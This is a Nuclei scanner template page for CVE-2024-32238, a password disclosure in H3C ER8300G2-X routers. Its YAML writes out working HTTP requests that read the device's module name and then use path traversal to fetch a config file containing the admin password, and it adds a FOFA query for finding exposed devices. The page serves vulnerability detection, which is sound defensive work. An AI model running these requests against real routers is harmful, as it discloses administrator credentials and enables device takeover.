Skip to content
Nuclei Templates

H3C ER8300G2-X - Password Disclosure

ID: CVE-2024-32238

Severity: critical

Author: s4e-io,adeljck

Tags: cve,cve2024,h3c,router,info-leak

Description

Section titled “Description”

H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router’s management system can be accessed via the management system page login interface.

YAML Source

Section titled “YAML Source”
id: CVE-2024-32238


info:
  name: H3C ER8300G2-X - Password Disclosure
  author: s4e-io,adeljck
  severity: critical
  description: |
    H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface.
  reference:
    - https://github.com/wy876/POC/blob/main/H3C/H3C%E8%B7%AF%E7%94%B1%E5%99%A8userLogin.asp%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
    - https://github.com/asdfjkl11/CVE-2024-32238/issues/1
    - https://www.h3c.com/cn/Products_And_Solution/InterConnect/Products/Routers/Products/Enterprise/ER/ER8300G2-X/
    - https://github.com/20142995/nuclei-templates
    - https://github.com/FuBoLuSec/CVE-2024-32238
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-32238
    cwe-id: CWE-522
    epss-score: 0.00053
    epss-percentile: 0.23191
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="icg_helpScript.js"
  tags: cve,cve2024,h3c,router,info-leak


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET /userLogin.asp HTTP/1.1
        Host: {{Hostname}}


    extractors:
      - type: regex
        name: module_name
        part: body
        internal: true
        group: 1
        regex:
          - "<title>([A-Za-z0-9-]+)系统管理</title>"


  - raw:
      - |
        GET /userLogin.asp/../actionpolicy_status/../{{module_name}}.cfg HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - 'contains(content_type, "application/x-unknown")'
          - 'contains_all(body, "admpwd=", "auxauthmode=")'
          - 'contains(server, "H3C-Miniware")'
        condition: and
# digest: 490a0046304402201573e81732963318daef6a15f22070ac6b2d09193373afe5d2d38d12fb82b0840220630173c580730795511f10fc1e64378228f7b46901743a130f0b55b51de6eb03:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-32238.yaml"

View on Github